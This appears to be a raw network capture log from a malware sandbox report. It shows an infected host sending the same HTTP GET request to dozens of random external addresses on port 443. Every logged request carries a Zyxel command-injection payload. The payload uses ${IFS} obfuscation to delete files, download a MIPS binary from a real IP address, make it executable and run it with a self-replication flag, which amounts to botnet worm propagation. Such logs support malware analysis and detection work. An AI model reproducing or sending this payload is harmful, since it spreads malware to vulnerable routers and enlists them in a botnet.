                                      Jan 14, 2024 15:51:01.646693945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8155192.168.2.1442688104.170.244.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646733046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8156192.168.2.144119885.228.76.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646769047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8157192.168.2.1458408197.15.101.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646823883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8158192.168.2.1443496145.61.7.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646845102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8159192.168.2.1457504212.157.114.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646888018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8160192.168.2.1441050124.195.58.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646934986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8161192.168.2.145597663.1.108.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646984100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8162192.168.2.1455136222.219.190.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647038937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8163192.168.2.1443390181.228.254.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647068024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8164192.168.2.1435560163.158.36.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647099018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8165192.168.2.1447468212.56.17.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647142887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8166192.168.2.1460298151.39.88.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647180080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8167192.168.2.1451338203.73.163.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647206068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8168192.168.2.1440372153.64.74.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647255898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8169192.168.2.1452962152.91.148.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647293091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8170192.168.2.1456956158.80.203.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647349119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8171192.168.2.1440542102.204.91.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647408962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8172192.168.2.1437536209.0.255.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647432089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8173192.168.2.1450928209.238.91.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647499084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8174192.168.2.144128046.138.161.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647530079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8175192.168.2.144545245.215.64.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647571087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8176192.168.2.1451124123.92.210.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647625923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8177192.168.2.144441657.140.5.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647680044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8178192.168.2.1433714208.223.173.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647711992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8179192.168.2.1448600113.12.109.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647738934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8180192.168.2.1445398145.201.247.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647769928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8181192.168.2.1457932213.25.101.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647815943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8182192.168.2.143558870.156.33.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647826910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8183192.168.2.144400839.221.85.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647885084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8184192.168.2.1452488212.158.43.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647937059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8185192.168.2.1453590102.11.16.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.647974968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8186192.168.2.14522428.49.90.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648032904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8187192.168.2.1440154114.179.82.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648060083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8188192.168.2.1446148120.92.99.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648080111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8189192.168.2.1456502158.191.221.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648111105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8190192.168.2.1438576131.4.119.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648163080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8191192.168.2.145282844.11.44.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648210049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8192192.168.2.1449870132.98.101.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648247957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8193192.168.2.143712295.190.34.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648293972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8194192.168.2.1438254156.74.232.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648345947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8195192.168.2.145614097.85.247.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648394108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8196192.168.2.1445492212.144.124.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648426056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8197192.168.2.145089873.0.150.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648469925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8198192.168.2.1440824166.78.177.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648530960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8199192.168.2.145089673.226.13.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648606062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8200192.168.2.144230051.129.203.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648647070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8201192.168.2.1437480169.103.152.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648689985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8202192.168.2.144695282.23.188.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648725033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8203192.168.2.1436120186.41.22.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648760080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8204192.168.2.143835634.214.221.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648792028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8205192.168.2.1435464153.88.66.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648827076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8206192.168.2.143376272.94.238.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648899078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8207192.168.2.1442276117.97.167.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648909092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8208192.168.2.144471012.41.203.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648961067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8209192.168.2.1454892135.169.33.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.648999929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8210192.168.2.144875651.47.47.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649050951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8211192.168.2.1459460198.185.222.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649079084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8212192.168.2.145403280.46.117.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649116993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8213192.168.2.1453220204.231.95.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649151087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8214192.168.2.144744824.160.191.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649194956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8215192.168.2.1439252110.150.227.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649230957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8216192.168.2.1437094187.98.42.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649276018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8217192.168.2.146052251.192.243.146443
                                      TimestampBytes transferredDirectionData
